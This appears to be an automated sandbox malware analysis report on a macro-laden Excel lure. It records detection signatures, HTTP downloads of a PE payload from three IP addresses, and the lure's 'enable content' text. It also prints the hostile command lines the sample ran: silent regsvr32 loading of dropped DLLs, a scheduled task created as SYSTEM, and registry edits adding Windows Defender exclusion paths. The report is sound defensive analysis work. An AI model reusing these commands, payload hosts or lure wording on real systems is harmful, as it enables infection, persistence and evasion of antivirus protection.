Windows Analysis Report Claim-838392655-09242021.xls

Overview

General Information

Sample Name:Claim-838392655-09242021.xls
Analysis ID:491203
MD5:295dbcf85c2baffd99e4670c21afc93c
SHA1:3dfb83a771615b879d20445ff5e5143d5846de6a
SHA256:acf0a503e9bdf8a32edfb667776fd159a70f4f9173c01c024c82bb6dd658e451
Tags:xls

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2824 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1320 cmdline: regsvr32 -silent ..\Fiosa.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2196 cmdline: -silent ..\Fiosa.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2592 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2820 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 1516 cmdline: regsvr32 -silent ..\Fiosa1.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2152 cmdline: -silent ..\Fiosa1.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 3060 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
    • regsvr32.exe (PID: 2972 cmdline: regsvr32 -silent ..\Fiosa2.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2012 cmdline: -silent ..\Fiosa2.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2100 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • regsvr32.exe (PID: 1812 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2788 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 536 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 840 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2188 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 2684 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1184 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Claim-838392655-09242021.xls | Rule: JoeSecurity_HiddenMacro | Description: Yara detected hidden Macro 4.0 in Excel | Author: Joe Security | Strings: (none)

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: regsvr32 -silent ..\Fiosa.der, CommandLine: regsvr32 -silent ..\Fiosa.der, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2824, ProcessCommandLine: regsvr32 -silent ..\Fiosa.der, ProcessId: 1320
    Sigma detected: Regsvr32 Command Line Without DLL
    Source: Process started | Author: Florian Roth | Data: Command: -silent ..\Fiosa.der, CommandLine: -silent ..\Fiosa.der, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Fiosa.der, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1320, ProcessCommandLine: -silent ..\Fiosa.der, ProcessId: 2196

    Persistence and Installation Behavior:

    Sigma detected: Schedule system process
    Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2592, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24, ProcessId: 2820

    Jbx Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: Claim-838392655-09242021.xls | ReversingLabs: Detection: 26%
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat | Metadefender: Detection: 28%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat | ReversingLabs: Detection: 28%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat | Metadefender: Detection: 28%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat | ReversingLabs: Detection: 28%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat | Metadefender: Detection: 28%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat | ReversingLabs: Detection: 28%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb | source: regsvr32.exe, 00000005.00000002.522715533.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.576566085.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 23_2_0008AEB4 FindFirstFileW,FindNextFileW,

    Software Vulnerabilities:

    Document exploit detected (drops PE files)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 44466.4649013889[1].dat.0.dr
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 190.14.37.173:80 (this entry appears twice in the report)
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 09:10:25 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.4649013889.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 
00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 09:10:30 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.4649013889.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 
00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 09:10:32 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.4649013889.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 
00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global traffic | HTTP traffic detected: GET /44466.4649013889.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.173
      Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /44466.4649013889.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 111.90.148.104
      Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /44466.4649013889.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 51.89.115.111
      Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.173 (this entry is repeated 50 times in the report)
    Source: regsvr32.exe, 00000005.00000002.519787979.0000000002370000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575187514.00000000020D0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000004.00000002.523226546.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.519424175.0000000001E40000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.578213273.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.574806742.0000000001C10000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000005.00000002.519787979.0000000002370000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575187514.00000000020D0000.00000002.00020000.sdmp, explorer.exe, 00000008.00000002.906659825.0000000002070000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
    Source: Screenshot number: 4 | Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
    Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 0 | Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
    Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 1 | Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
    Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Office process drops PE file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 8_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 23_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 23_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 23_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 23_2_00094FC0
